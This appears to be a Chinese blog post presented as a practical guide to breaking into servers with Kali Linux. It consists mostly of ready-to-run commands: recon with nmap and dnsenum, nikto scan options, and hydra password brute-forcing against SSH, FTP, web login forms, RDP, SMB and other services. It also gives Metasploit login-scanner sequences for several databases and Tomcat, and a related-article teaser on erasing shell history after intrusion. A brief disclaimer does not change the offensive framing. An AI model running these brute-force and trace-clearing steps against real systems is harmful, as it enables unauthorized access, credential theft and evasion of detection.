kali入侵服务器的那一套实战
dnsenum -enum xxxxx.com 枚举出网站的所有域名和服务器的ip地址
打开百度查询ip地址的所在地
whatweb xxxx.com 查看那些网站入口可以访问 以状态码为准
whois ip地址 查看ip所在地
nmap -sS ip 匿名查看服务器开放的端口
nmap -O或-A 查看服务器的什么系统
nmap -sV 查看服务器开放端口以及服务器版本
[nikto]
漏洞扫描
-T 选项包含了许多小选项,-T 9 表示扫描sql注入漏洞
0检查文件上传页面
1检查web日志
2检查错误配置或默认文件
3检查信息泄露问题
4检查XSS/Script/Html问题
5从根目录检查是否存在可访问的文件
6检查拒绝服务器问题
7从任意文件检索是否存在可访问文件
8检查是否存在系统命令执行漏洞
9检查sql注入漏洞
b识别安装的软件版本
c检查源代码泄露问题
x反向链接选项
nikto -h ip 普通扫描全部漏洞
nikto -h -h ip -p 端口号 扫描指定端口漏洞
nikto -h ip -C all all表示CGI目录猜解
nikto -h ip -T 9 扫描sql注入漏洞
知道漏洞后开始爆破
[hydra(九头蛇)]
-l 指定爆破帐号
-w 指定每个县城的回应时间为10
-P 指定密码字典
-t 指定爆破线程
-v 指定现实爆破过程
-f 查找到第一个可以使用的id和密码的时候停止破解
hydra -l root -w 10 -P passwd.txt -t 10 -f ip地址 ssh
hydra -L /home/chenglee/zidian/user.txt -P /home/chenglee/zidian/wordlist.TXT 192.168.137.133 mysql
hydra -L user.txt -P pass.txt -V -t 10 ssh://192.168.0.1:22
暴力破解:
参数:
-R 继续从上一次进度接着破解
-S 大写,采用SSL链接
-s 小写,可通过这个参数指定非默认端口
-l 指定破解的用户,对特定用户破解
-L 指定用户名字典
-p 小写,指定密码破解,少用,一般是采用密码字典
-P 大写,指定密码字典
-e 可选选项,n:空密码试探,s:使用指定用户和密码试探
-C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数
-M 指定目标列表文件一行一条
-o 指定结果输出文件
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
-t 同时运行的线程数,默认为16
-w 设置最大超时的时间,单位秒,默认是30s
-v /-V显示详细过程
各协议的具体命令:
格式+示例:
1、破解ssh:
hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
2、破解ftp:
hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3、get方式提交,破解web登录:
hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get/admin/index.PHP
4、post方式提交,破解web登录:
hydra --L 用户名字典 -P 密码字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form"login.php:id=^USER^&passwd=^PASS^:<title>wrong username orpassword</title>"
参数说明:
-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止,
10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示
5、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6、破解teamspeak:
hydra -L 用户名字典 -P 密码字典 -s 端口号 -vV ip teamspeak
7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8、破解smb:
hydra -L 用户名字典 -P pass.txt 10.36.16.18 smb
9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V
11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
-------------------------------------------------------------------
Kali Linux(Metasploit口令猜解模块)
Metasploit口令猜解模块——
SSH服务口令猜解:
msf > use auxiliary/scanner/ssh/ssh_login(使用ssh_login模块)
msf auxiliary(ssh_login) > show options (查看选项)
msf auxiliary(ssh_login) > set RHOSTS 10.107.0.99(目标)
msf auxiliary(ssh_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)
msf auxiliary(ssh_login) > set PASS_FILE /root/pass.txt(密码字典文件)
msf auxiliary(ssh_login) > set THREADS 50(线程)
msf auxiliary(ssh_login) > exploit (开始)
Telnet口令猜解:
msf > use auxiliary/scanner/telnet/telnet_login (使用telnet_login模块)
msf auxiliary(telnet_login) > show options (查看选项)
msf auxiliary(telnet_login) > set RHOSTS 10.180.100.141(目标)
msf auxiliary(telnet_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)
msf auxiliary(telnet_login) > set PASS_FILE /root/pass.txt(密码字典文件)
msf auxiliary(telnet_login) > exploit (开始)
Samba口令猜解:
msf > use auxiliary/scanner/smb/smb_login (使用smb_login模块)
msf auxiliary(smb_login) > show options (查看选项)
msf auxiliary(smb_login) > set RHOSTS 10.180.100.10(目标)
msf auxiliary(ssmb_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)
msf auxiliary(ssmb_login) > set PASS_FILE /root/pass.txt(密码字典文件)
msf auxiliary(ssmb_login) > exploit(开始)
Mysql口令猜解:
msf > use auxiliary/scanner/mysql/mysql_login (使用mysql_login模块)
msf auxiliary(mysql_login) > show options (查看选项)
msf auxiliary(mysql_login) > set RHOSTS 192.168.230.176(目标)
msf auxiliary(mysql_login) > set USERNAME root(用户名字典,或指定用户)
msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt(密码字典文件)
msf auxiliary(mysql_login) > exploit(开始)
Postgresq口令猜解:
msf > use auxiliary/scanner/postgres/postgres_login (使用postgres_login模块)
msf auxiliary(postgres_login) > show options (查看选项)
msf auxiliary(postgres_login) > set RHOSTS 192.168.230.10(目标)
msf auxiliary(postgres_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)
msf auxiliary(postgres_login) > set PASS_FILE /root/pass.txt(密码字典文件)
msf auxiliary(postgres_login) > exploit (开始)
Mssql口令猜解:
msf > use auxiliary/scanner/mssql/mssql_login (使用mssql_login 模块)
msf auxiliary(mssql_login) > show options (查看选项)
msf auxiliary(mssql_login) > set RHOSTS 10.107.0.64(目标)
msf auxiliary(mssql_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)
msf auxiliary(mssql_login) > set PASS_FILE /root/pass.txt(密码字典文件)
msf auxiliary(mssql_login) > exploit(开始)
Tomcat口令猜解:
msf > use auxiliary/scanner/http/tomcat_mgr_login (使用tomcat_mgr_login模块)
msf auxiliary(tomcat_mgr_login) > show options(查看选项)
msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.230.176(目标)
msf auxiliary(tomcat_mgr_login) > set USER_FILE username.txt(用户名字典,或指定用户)
msf auxiliary(tomcat_mgr_login) > set PASS_FILE /root/pass.txt(密码字典文件)
msf auxiliary(tomcat_mgr_login) > exploit(开始)
hydra -l root -P /password.txt -vV -t 10 -f ip ssh
也可以写一个python脚本爆破
隆重声明注意自己的行为,不要搞别人,人外有人,天外有天!
kali入侵服务器的那一套实战的更多相关文章
- kali入侵服务器之后清除痕迹
Linux清除痕迹 第一种方法: 在退出会话前直接执行: #history -r 清除当前会话的命令历史记录 第二种方法: 在vim中执行自己不想让别人看到的命令随便用vim打开一个文件 :set h ...
- Java如何使服务器允许连接到套接字端口?
在Java编程中,如何使服务器允许连接到套接字端口? 以下示例显示如何使服务器通过使用ServerSocket类的server.accept()方法和Socket类的sock.getInetAddre ...
- 如何在同一台服务器上安装多套通达OA
本人最近研究了在同一服务器安装多套通达OA的方法:发现网上关于这个话题的文章比较少,于是录制成视频,在此发布,希望对有这方面需求的朋友有所帮助: http://blog.163.com/zhuwei_ ...
- 使用express+shell在服务器上搭建一套简单的前端部署系统
前言 个人项目越来越多,部署需要频繁操作服务器,所以手动搭建一套简单的部署系统. 效果如图 其中包含 原生html+css+js项目,单页面react, vue, angular项目,实现了一键打包发 ...
- 黑客是如何通过开放的Redis服务入侵服务器的
0x00 简要说明 百度百科:Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写.支持网络.可基于内存亦可持久化的日志型.Key-V ...
- 连接到kali linux服务器上的MySQL服务器错误
前言:想把数据库什么的都放在虚拟机kali Linux里,但无奈出了好多错误. 首先:可以参照上一篇文章开启kali服务器端的远程连接功能,上一篇文章 然后:使用window端的sqlyog(MySQ ...
- 服务器后端开发系列——《实战Memcached内存缓存系统》
1.实战Memcached缓存系统(1)Memcached基础及示例程序 内容:建筑Memcached背景知识和入门示例程序. 2.实战Memcached缓存系统(2)Memcached Java A ...
- 服务器后端开发系列——《实战FastDFS分布式文件系统》[转]
1.FastDFS的配置.部署与API使用解读(1)Get Started with FastDFS 内容:讲解FastDFS的背景.基本原理,并讲述基本的配置.部署和测试的内容. 2.FastDFS ...
- TCP ------ TCP创建服务器中出现的套接字
在服务器端,socket()返回的套接字用于监听(listen)和接受(accept)客户端的连接请求.这个套接字不能用于与客户端之间发送和接收数据. accept()接受一个客户端的连接请求,并返回 ...
随机推荐
- redis---set类型常用命令
添加元素:sadd key value1 value2 查看指定key包含的元素:smembers key 判断指定元素是否存在于key的value中(0表示不存在,1表示存在):sismember ...
- C++ STL——stack和queue
目录 一 stack容器 二 queue容器 注:原创不易,转载请务必注明原作者和出处,感谢支持! 注:内容来自某培训课程,不一定完全正确! 栈和队列作为经典的数据结构,我们再熟悉不过了.C++ ST ...
- [转]MySQL查询语句执行过程详解
Mysql查询语句执行原理 数据库查询语句如何执行?语法分析:首先进行语法分析,对使用sql表示的查询进行语法分析,生成查询语法分析树.语义检查:检查sql中所涉及的对象以及是否在数据库中存在,用户是 ...
- itchat库微信自动回复祝福语
过年了,之前看到一些python文章介绍用itchat自动回复微信,我自己就写了一个. 官方文档https://itchat.readthedocs.io/zh/latest/,这个库挺简洁的,对着接 ...
- python中计时模块timeit的使用方法
timeit 模块: timeit 模块定义了接受两个参数的 Timer 类.两个参数都是字符串. 第一个参数是你要计时的语句或者函数. 传递给 Timer 的第二个参数是为第一个参数语句构建环境的导 ...
- linux中查找命令find、locate、whereis、which、type的区别
find find是最常见和最强大的查找命令,你可以用它找到任何你想找的文件.与查询数据库(/var/lib/locatedb)文件不同,find查找的是磁盘空间. locate locate命令其实 ...
- java中单例模式的优缺点
一.什么叫单例 对单例类实例化后拿到的都是堆里面的同一个实例对象,通俗一点就是所有的这个单例的实例化引用都指向堆内存中的一个实例对象(有且仅有一个) 使用场景:对象需要频繁的实例化和销毁,此时考虑使用 ...
- 【VS开发】程序员对内存的理解
程序员对内存的理解 在C和C++语言开发中,指针.内存一直是学习的重点.因为C语言作为一种偏底层的中低级语言,提供了大量的内存直接操作的方法,这一方面使程序的灵活度最大化,同时也为bug埋下很多隐患. ...
- vue-cli@webpack@4打包分析命令
一.命令 npm run build --report 该命令在打包完之后,可以分析包的大小(如下图),从而分析那一块打包太大了可以进行优化处理.
- python多进程单线程+协程实现高并发
并发:看起来像同时运行就是并发 并行:同一时间同时被执行叫做并行,最大并行数就是CPU核数 协程不是实实在在存在的物理基础和操作系统运行逻辑,只是程序员从代码层面避开了系统对遇到IO的程序会切走CPU ...